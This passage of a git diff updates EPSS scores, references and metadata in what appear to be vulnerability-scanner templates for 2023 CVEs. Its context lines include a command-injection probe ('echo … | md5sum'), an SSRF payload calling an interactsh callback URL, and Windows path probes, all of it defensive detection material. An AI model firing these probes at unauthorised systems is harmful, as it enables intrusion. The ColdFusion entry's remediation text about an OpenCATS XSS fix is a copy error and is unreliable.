0.26225 + epss-percentile: 0.26129 cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index d71cef55b3..19c286b720 100644 --- a/http/cves/2023/CVE-2023-39026.yaml +++ b/http/cves/2023/CVE-2023-39026.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-39026 cwe-id: CWE-22 - epss-score: 0.04867 - epss-percentile: 0.91904 + epss-score: 0.05678 + epss-percentile: 0.9256 cpe: cpe:2.3:a:filemage:filemage:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39108.yaml b/http/cves/2023/CVE-2023-39108.yaml index 237f118c25..d4329bbc38 100644 --- a/http/cves/2023/CVE-2023-39108.yaml +++ b/http/cves/2023/CVE-2023-39108.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-39108 cwe-id: CWE-918 epss-score: 0.01332 - epss-percentile: 0.8449 + epss-percentile: 0.84573 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml index 8b1de603d3..93f7a82354 100644 --- a/http/cves/2023/CVE-2023-39109.yaml +++ b/http/cves/2023/CVE-2023-39109.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-39109 cwe-id: CWE-918 epss-score: 0.01332 - epss-percentile: 0.84481 + epss-percentile: 0.84573 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39110.yaml b/http/cves/2023/CVE-2023-39110.yaml index 21ce4b1d5d..7219d2134d 100644 --- a/http/cves/2023/CVE-2023-39110.yaml +++ b/http/cves/2023/CVE-2023-39110.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-39110 cwe-id: CWE-918 epss-score: 0.01332 - epss-percentile: 0.8449 + epss-percentile: 0.84573 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml index 97e55c6a66..4af06fc9f2 100644 --- a/http/cves/2023/CVE-2023-39141.yaml +++ b/http/cves/2023/CVE-2023-39141.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-39141 cwe-id: CWE-22 epss-score: 0.00437 - epss-percentile: 0.71876 + epss-percentile: 0.72033 cpe: cpe:2.3:a:ziahamza:webui-aria2:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index c40446bd2b..1395fe6044 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-39143 cwe-id: CWE-22 - epss-score: 0.89149 - epss-percentile: 0.98447 + epss-score: 0.88084 + epss-percentile: 0.98414 cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml index a1b1558489..93a3478b74 100644 --- a/http/cves/2023/CVE-2023-3936.yaml +++ b/http/cves/2023/CVE-2023-3936.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-3936 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26298 + epss-percentile: 0.26204 cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index 035c9f2b4a..73ea1f3d47 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-39361 cwe-id: CWE-89 - epss-score: 0.14923 - epss-percentile: 0.95259 + epss-score: 0.11728 + epss-percentile: 0.94773 cpe: cpe:2.3:a:cacti:cacti:1.2.24:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index 0ecd618a76..ba79493d39 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-39598 cwe-id: CWE-79 - epss-score: 0.00456 - epss-percentile: 0.72443 + epss-score: 0.00614 + epss-percentile: 0.76425 cpe: cpe:2.3:a:icewarp:webclient:10.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml index fa455783dd..fd7f114776 100644 --- a/http/cves/2023/CVE-2023-39600.yaml +++ b/http/cves/2023/CVE-2023-39600.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-39600 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26237 + epss-percentile: 0.26129 cpe: cpe:2.3:a:icewarp:icewarp:11.4.6.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index ca1a14ae7c..ef8fe74619 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-39676 cwe-id: CWE-79 epss-score: 0.00167 - epss-percentile: 0.53269 + epss-percentile: 0.53357 cpe: cpe:2.3:a:fieldthemes:fieldpopupnewsletter:1.0.0:*:*:*:*:prestashop:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml index eb45a8d275..fd9931ebbf 100644 --- a/http/cves/2023/CVE-2023-39677.yaml +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2023-39677 epss-score: 0.00632 - epss-percentile: 0.76689 + epss-percentile: 0.76782 cpe: cpe:2.3:a:simpleimportproduct_project:simpleimportproduct:6.2.9:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39700.yaml b/http/cves/2023/CVE-2023-39700.yaml index 66eebdb004..7dc0f9b1cc 100644 --- a/http/cves/2023/CVE-2023-39700.yaml +++ b/http/cves/2023/CVE-2023-39700.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-39700 cwe-id: CWE-79 epss-score: 0.00103 - epss-percentile: 0.41481 + epss-percentile: 0.41562 cpe: cpe:2.3:a:icewarp:mail_server:10.4.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39796.yaml b/http/cves/2023/CVE-2023-39796.yaml index 611d629a61..3c7a927db2 100644 --- a/http/cves/2023/CVE-2023-39796.yaml +++ b/http/cves/2023/CVE-2023-39796.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-39796 cwe-id: CWE-89 - epss-score: 0.02969 - epss-percentile: 0.89791 + epss-score: 0.03223 + epss-percentile: 0.90219 cpe: cpe:2.3:a:wbce:wbce_cms:1.6.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-40208.yaml b/http/cves/2023/CVE-2023-40208.yaml index 344223bf89..abe7f3f164 100644 --- a/http/cves/2023/CVE-2023-40208.yaml +++ b/http/cves/2023/CVE-2023-40208.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-40208 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26301 + epss-percentile: 0.26209 cpe: cpe:2.3:a:urosevic:stock_ticker:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-40779.yaml b/http/cves/2023/CVE-2023-40779.yaml index fa14298382..592e927a2b 100644 --- a/http/cves/2023/CVE-2023-40779.yaml +++ b/http/cves/2023/CVE-2023-40779.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-40779 cwe-id: CWE-601 - epss-score: 0.00647 - epss-percentile: 0.76977 + epss-score: 0.00869 + epss-percentile: 0.80544 cpe: cpe:2.3:a:icewarp:deep_castle_g2:13.0.1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4110.yaml b/http/cves/2023/CVE-2023-4110.yaml index da7ee8b64a..ed4ba302d6 100644 --- a/http/cves/2023/CVE-2023-4110.yaml +++ b/http/cves/2023/CVE-2023-4110.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4110 cwe-id: CWE-79 - epss-score: 0.00207 - epss-percentile: 0.58446 + epss-score: 0.002 + epss-percentile: 0.57852 cpe: cpe:2.3:a:phpjabbers:availability_booking_calendar:5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-41109.yaml b/http/cves/2023/CVE-2023-41109.yaml index c4a78d7374..ee63cdee64 100644 --- a/http/cves/2023/CVE-2023-41109.yaml +++ b/http/cves/2023/CVE-2023-41109.yaml @@ -10,16 +10,19 @@ info: Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. - reference: | + reference: |- - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-019.txt - https://nvd.nist.gov/vuln/detail/CVE-2023-41109 + - http://packetstormsecurity.com/files/175945/SmartNode-SN200-3.21.2-23021-OS-Command-Injection.html + - http://seclists.org/fulldisclosure/2023/Nov/12 + - https://www.syss.de/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-41109 cwe-id: CWE-78 - epss-score: 0.0009 - epss-percentile: 0.37749 + epss-score: 0.25963 + epss-percentile: 0.96281 cpe: cpe:2.3:o:patton:smartnode_sn200_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +30,6 @@ info: vendor: patton product: smartnode_sn200_firmware tags: cve,cve2023,smartnode,voip - variables: payload: "echo CVE-2023-41109 | md5sum" diff --git a/http/cves/2023/CVE-2023-4111.yaml b/http/cves/2023/CVE-2023-4111.yaml index b98a09b765..9271b5c381 100644 --- a/http/cves/2023/CVE-2023-4111.yaml +++ b/http/cves/2023/CVE-2023-4111.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4111 cwe-id: CWE-79 - epss-score: 0.00207 - epss-percentile: 0.58431 + epss-score: 0.002 + epss-percentile: 0.57852 cpe: cpe:2.3:a:phpjabbers:bus_reservation_system:1.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4112.yaml b/http/cves/2023/CVE-2023-4112.yaml index 819cfd1454..25d988b45f 100644 --- a/http/cves/2023/CVE-2023-4112.yaml +++ b/http/cves/2023/CVE-2023-4112.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4112 cwe-id: CWE-79 - epss-score: 0.00249 - epss-percentile: 0.62622 + epss-score: 0.00231 + epss-percentile: 0.61239 cpe: cpe:2.3:a:phpjabbers:shuttle_booking_software:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4113.yaml b/http/cves/2023/CVE-2023-4113.yaml index 669dff8d69..fc148da126 100644 --- a/http/cves/2023/CVE-2023-4113.yaml +++ b/http/cves/2023/CVE-2023-4113.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4113 cwe-id: CWE-79 - epss-score: 0.00301 - epss-percentile: 0.66154 + epss-score: 0.00263 + epss-percentile: 0.63891 cpe: cpe:2.3:a:phpjabbers:service_booking_script:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4114.yaml b/http/cves/2023/CVE-2023-4114.yaml index 234d052198..0439217d30 100644 --- a/http/cves/2023/CVE-2023-4114.yaml +++ b/http/cves/2023/CVE-2023-4114.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4114 cwe-id: CWE-79 - epss-score: 0.00447 - epss-percentile: 0.72158 + epss-score: 0.0039 + epss-percentile: 0.70505 cpe: cpe:2.3:a:phpjabbers:night_club_booking_software:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4115.yaml b/http/cves/2023/CVE-2023-4115.yaml index c3c1d9c703..77481fba8f 100644 --- a/http/cves/2023/CVE-2023-4115.yaml +++ b/http/cves/2023/CVE-2023-4115.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4115 cwe-id: CWE-79 - epss-score: 0.00301 - epss-percentile: 0.66154 + epss-score: 0.00263 + epss-percentile: 0.63891 cpe: cpe:2.3:a:phpjabbers:cleaning_business_software:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml index a549df5f70..bd6b85a7b7 100644 --- a/http/cves/2023/CVE-2023-4116.yaml +++ b/http/cves/2023/CVE-2023-4116.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4116 cwe-id: CWE-79 - epss-score: 0.00301 - epss-percentile: 0.66154 + epss-score: 0.00263 + epss-percentile: 0.63891 cpe: cpe:2.3:a:phpjabbers:taxi_booking_script:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-41265.yaml b/http/cves/2023/CVE-2023-41265.yaml index aaf7cccd83..1590dbdfe6 100644 --- a/http/cves/2023/CVE-2023-41265.yaml +++ b/http/cves/2023/CVE-2023-41265.yaml @@ -17,10 +17,11 @@ info: cvss-score: 9.9 cve-id: CVE-2023-41265 cwe-id: CWE-444 - epss-score: 0.01134 - epss-percentile: 0.83028 + epss-score: 0.78543 + epss-percentile: 0.97976 cpe: cpe:2.3:a:qlik:qlik_sense:august_2022:-:*:*:enterprise:windows:*:* metadata: + max-request: 1 vendor: qlik product: qlik_sense framework: windows diff --git a/http/cves/2023/CVE-2023-41266.yaml b/http/cves/2023/CVE-2023-41266.yaml index 2c15c15d61..66c47a0ddd 100644 --- a/http/cves/2023/CVE-2023-41266.yaml +++ b/http/cves/2023/CVE-2023-41266.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-41266 cwe-id: CWE-20 - epss-score: 0.00238 - epss-percentile: 0.61675 + epss-score: 0.526 + epss-percentile: 0.97294 cpe: cpe:2.3:a:qlik:qlik_sense:august_2022:-:*:*:enterprise:windows:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4148.yaml b/http/cves/2023/CVE-2023-4148.yaml index 6828aba81b..3d6643839d 100644 --- a/http/cves/2023/CVE-2023-4148.yaml +++ b/http/cves/2023/CVE-2023-4148.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-4148 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26314 + epss-percentile: 0.26209 cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-41538.yaml b/http/cves/2023/CVE-2023-41538.yaml index 975c4d3455..cb4ff266eb 100644 --- a/http/cves/2023/CVE-2023-41538.yaml +++ b/http/cves/2023/CVE-2023-41538.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-41538 cwe-id: CWE-79 epss-score: 0.00109 - epss-percentile: 0.43386 + epss-percentile: 0.4345 cpe: cpe:2.3:a:phpjabbers:php_forum_script:3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-41642.yaml b/http/cves/2023/CVE-2023-41642.yaml index 588e3663d0..83c91ae95b 100644 --- a/http/cves/2023/CVE-2023-41642.yaml +++ b/http/cves/2023/CVE-2023-41642.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-41642 cwe-id: CWE-79 epss-score: 0.00062 - epss-percentile: 0.24707 + epss-percentile: 0.24612 cpe: cpe:2.3:a:grupposcai:realgimm:1.1.37:p38:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-4168.yaml b/http/cves/2023/CVE-2023-4168.yaml index 7c3a8e843f..3d3b5976fb 100644 --- a/http/cves/2023/CVE-2023-4168.yaml +++ b/http/cves/2023/CVE-2023-4168.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-4168 cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.25059 - epss-percentile: 0.96203 + epss-score: 0.21058 + epss-percentile: 0.95974 cpe: cpe:2.3:a:templatecookie:adlisting:2.14.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4169.yaml b/http/cves/2023/CVE-2023-4169.yaml index 58ca6b1585..57c45dd667 100644 --- a/http/cves/2023/CVE-2023-4169.yaml +++ b/http/cves/2023/CVE-2023-4169.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-4169 cwe-id: CWE-284,NVD-CWE-noinfo - epss-score: 0.01313 - epss-percentile: 0.84384 + epss-score: 0.00803 + epss-percentile: 0.79768 cpe: cpe:2.3:o:ruijie:rg-ew1200g_firmware:1.0\(1\)b1p5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index 5821ff93ee..78d7bbc3a2 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4173 cwe-id: CWE-79 - epss-score: 0.00234 - epss-percentile: 0.61272 + epss-score: 0.00226 + epss-percentile: 0.60816 cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 5380d313e0..7c4cf3e192 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-4174 cwe-id: CWE-79 epss-score: 0.00209 - epss-percentile: 0.58674 + epss-percentile: 0.58844 cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-41763.yaml b/http/cves/2023/CVE-2023-41763.yaml index c39e27d81e..3afac0c482 100644 --- a/http/cves/2023/CVE-2023-41763.yaml +++ b/http/cves/2023/CVE-2023-41763.yaml @@ -10,11 +10,20 @@ info: - https://frycos.github.io/vulns4free/2022/09/26/skype-audit-part2.html - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-41763 - https://nvd.nist.gov/vuln/detail/CVE-2023-41763 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-41763 + epss-score: 0.15841 + epss-percentile: 0.95426 + cpe: cpe:2.3:a:microsoft:skype_for_business_server:2015:cumulative_update_13:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: microsoft + product: skype_for_business_server shodan-query: html:"Skype for Business" - tags: cve,cve2023,skype,blind-ssrf,oast,ssrf + tags: cve,cve2023,skype,blind-ssrf,oast,ssrf,kev variables: ssrfpayload: "http://{{interactsh-url}}/?id={{rand_base(3)}}%25{1337*1337}#.xx//" diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml index 8d22b64e32..fb11dbbfb9 100644 --- a/http/cves/2023/CVE-2023-41892.yaml +++ b/http/cves/2023/CVE-2023-41892.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-41892 cwe-id: CWE-94 - epss-score: 0.20628 - epss-percentile: 0.95883 + epss-score: 0.87483 + epss-percentile: 0.98382 cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-42343.yaml b/http/cves/2023/CVE-2023-42343.yaml index 0dcff613b6..45f2899740 100644 --- a/http/cves/2023/CVE-2023-42343.yaml +++ b/http/cves/2023/CVE-2023-42343.yaml @@ -12,9 +12,9 @@ info: classification: cve-id: CVE-2023-42343 metadata: + verified: true max-request: 1 shodan-query: "/opencms/" - verified: true tags: cve,cve2023,xss,opencms http: diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml index e1cb888558..a20053ffe9 100644 --- a/http/cves/2023/CVE-2023-42442.yaml +++ b/http/cves/2023/CVE-2023-42442.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-42442 cwe-id: CWE-287 - epss-score: 0.09005 - epss-percentile: 0.93981 + epss-score: 0.09144 + epss-percentile: 0.94063 cpe: cpe:2.3:a:fit2cloud:jumpserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml index bd39bc9578..7c6c01011a 100644 --- a/http/cves/2023/CVE-2023-42793.yaml +++ b/http/cves/2023/CVE-2023-42793.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-42793 cwe-id: CWE-288 - epss-score: 0.97264 - epss-percentile: 0.99817 + epss-score: 0.97283 + epss-percentile: 0.99836 cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-43261.yaml b/http/cves/2023/CVE-2023-43261.yaml index 7c55e0f060..5de8220e2a 100644 --- a/http/cves/2023/CVE-2023-43261.yaml +++ b/http/cves/2023/CVE-2023-43261.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-43261 cwe-id: CWE-532 epss-score: 0.00476 - epss-percentile: 0.73003 + epss-percentile: 0.73134 cpe: cpe:2.3:o:milesight:ur5x_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-43325.yaml b/http/cves/2023/CVE-2023-43325.yaml index 2f1e6ee7ff..2e15483336 100644 --- a/http/cves/2023/CVE-2023-43325.yaml +++ b/http/cves/2023/CVE-2023-43325.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-43325 cwe-id: CWE-79 epss-score: 0.41721 - epss-percentile: 0.96951 + epss-percentile: 0.96972 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-43326.yaml b/http/cves/2023/CVE-2023-43326.yaml index 9ad23be6fa..abbd002028 100644 --- a/http/cves/2023/CVE-2023-43326.yaml +++ b/http/cves/2023/CVE-2023-43326.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-43326 cwe-id: CWE-79 epss-score: 0.00643 - epss-percentile: 0.76908 + epss-percentile: 0.77002 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-43795.yaml b/http/cves/2023/CVE-2023-43795.yaml index 32d440daca..10cc85e11b 100644 --- a/http/cves/2023/CVE-2023-43795.yaml +++ b/http/cves/2023/CVE-2023-43795.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-43795 cwe-id: CWE-918 - epss-score: 0.12207 - epss-percentile: 0.94838 + epss-score: 0.10955 + epss-percentile: 0.94582 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4415.yaml b/http/cves/2023/CVE-2023-4415.yaml index 5d2997f076..d3fe00134a 100644 --- a/http/cves/2023/CVE-2023-4415.yaml +++ b/http/cves/2023/CVE-2023-4415.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-4415 cwe-id: CWE-287 epss-score: 0.00355 - epss-percentile: 0.68878 + epss-percentile: 0.69044 cpe: cpe:2.3:o:ruijienetworks:rg-ew1200g_firmware:07161417_r483:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-44353.yaml b/http/cves/2023/CVE-2023-44353.yaml index 0d533a93dd..c6074cc237 100644 --- a/http/cves/2023/CVE-2023-44353.yaml +++ b/http/cves/2023/CVE-2023-44353.yaml @@ -5,7 +5,7 @@ info: author: salts severity: critical description: | - Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction. + Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability. reference: @@ -13,12 +13,12 @@ info: - https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html - https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-44353 cwe-id: CWE-502 - epss-score: 0.00227 - epss-percentile: 0.60906 + epss-score: 0.00456 + epss-percentile: 0.72579 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +27,6 @@ info: product: coldfusion shodan-query: http.component:"Adobe ColdFusion" tags: cve,cve2023,adobe,coldfusion,deserialization - variables: windows_known_path: "C:\\Windows\\" windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\" diff --git a/http/cves/2023/CVE-2023-4451.yaml b/http/cves/2023/CVE-2023-4451.yaml index 754c98f878..f3f5b833dc 100644 --- a/http/cves/2023/CVE-2023-4451.yaml +++ b/http/cves/2023/CVE-2023-4451.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-4451 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26237 + epss-percentile: 0.26129 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4547.yaml b/http/cves/2023/CVE-2023-4547.yaml index 77a2f9c030..c0eb381b01 100644 --- a/http/cves/2023/CVE-2023-4547.yaml +++ b/http/cves/2023/CVE-2023-4547.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4547 cwe-id: CWE-79 epss-score: 0.00205 - epss-percentile: 0.58226 + epss-percentile: 0.58383 cpe: cpe:2.3:a:spa-cart:ecommerce_cms:1.9.0.3:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-45542.yaml b/http/cves/2023/CVE-2023-45542.yaml index 6d1f6123bf..09e7a5a402 100644 --- a/http/cves/2023/CVE-2023-45542.yaml +++ b/http/cves/2023/CVE-2023-45542.yaml @@ -14,8 +14,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-45542 cwe-id: CWE-79 - epss-score: 0.00111 - epss-percentile: 0.43973 + epss-score: 0.001 + epss-percentile: 0.40724 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index 729b45025f..c0cee6811d 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-4568 cwe-id: CWE-287 epss-score: 0.00254 - epss-percentile: 0.63138 + epss-percentile: 0.6331 cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-45852.yaml b/http/cves/2023/CVE-2023-45852.yaml index 2d45db608c..97320e3fa5 100644 --- a/http/cves/2023/CVE-2023-45852.yaml +++ b/http/cves/2023/CVE-2023-45852.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-45852 cwe-id: CWE-77 - epss-score: 0.11006 - epss-percentile: 0.94566 + epss-score: 0.08478 + epss-percentile: 0.93821 cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4596.yaml b/http/cves/2023/CVE-2023-4596.yaml index 0d9ee94cfb..472bbc8afa 100644 --- a/http/cves/2023/CVE-2023-4596.yaml +++ b/http/cves/2023/CVE-2023-4596.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4596 cwe-id: CWE-434 epss-score: 0.08202 - epss-percentile: 0.93695 + epss-percentile: 0.93732 cpe: cpe:2.3:a:incsub:forminator:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index 622c46cca9..babd48bc80 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ 